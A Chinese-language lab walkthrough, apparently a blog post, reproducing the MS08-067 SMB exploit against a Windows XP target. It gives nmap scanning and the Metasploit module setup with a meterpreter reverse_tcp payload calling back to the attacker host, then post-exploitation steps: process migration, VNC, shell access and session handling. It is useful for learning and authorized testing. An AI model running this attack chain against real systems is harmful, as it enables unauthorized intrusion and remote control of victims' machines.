zoukankan      html  css  js  c++  java
  • ms08-067漏洞复现

    一、环境说明

    kali linux

    靶机是 XP (xp启动445)

    二、nmap扫描主机存在的漏洞

    root@kali:~# nmap --script smb-vuln* 192.168.244.138

    三、确定目标主机系统指纹

    root@kali:~# nmap -O 192.168.244.138

    四、msf ms08-067漏洞利用

    msf5 > search ms08-067
    msf5 > use exploit/windows/smb/ms08_067_netapi

    msf5 exploit(windows/smb/ms08_067_netapi) > show options

    指定目标主机

    msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.244.138

    查看Exploit target:

    msf5 exploit(windows/smb/ms08_067_netapi) > show targets

    Exploit targets

    设置target (靶机是Winows XP SP3中文简体版、所以设置target为34)

    msf5 exploit(windows/smb/ms08_067_netapi) > set target 34

    查看配置

    msf5 exploit(windows/smb/ms08_067_netapi) > show options

    设置payload  meterpreter载荷

    msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf5 exploit(windows/smb/ms08_067_netapi) > show options

     设置监听地址

    msf5 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.244.128   # 靶机连接的地址(一般是公网地址)这里设置为kali地址
    lhost => 192.168.244.128
    msf5 exploit(windows/smb/ms08_067_netapi) > set lport 1122        # 靶机建立连接端口
    lport => 1122
    msf5 exploit(windows/smb/ms08_067_netapi) > show options

    msf5 exploit(windows/smb/ms08_067_netapi) > run

     进程迁移/进程注入

    meterpreter > ps
    meterpreter > migrate 660

     启动vnc

    meterpreter > run vnc

     调用系统cmd

    meterpreter > shell

     挂起会话

    meterpreter > background

     查看挂机的会话

    msf5 exploit(windows/smb/ms08_067_netapi) > sessions -l

     连接会话

    msf5 exploit(windows/smb/ms08_067_netapi) > sessions -i 1

  • 相关阅读:
    java:线上问题排查常用手段
    去fastjson笔记
    如何让java中的注释代码执行?
    spring中aop不生效的几种解决办法
    mysql事务隔离级别/脏读/不可重复读/幻读详解
    业务系统-全球化多时区的解决思路
    mysql虚拟列(Generated Columns)及JSON字段类型的使用
    freeswitch笔记(7)-放音控制
    JVM问题典型案例定位学习
    freeswitch笔记(6)-会议功能简介
  • 原文地址:https://www.cnblogs.com/hwlong/p/8595714.html
Copyright © 2011-2022 走看看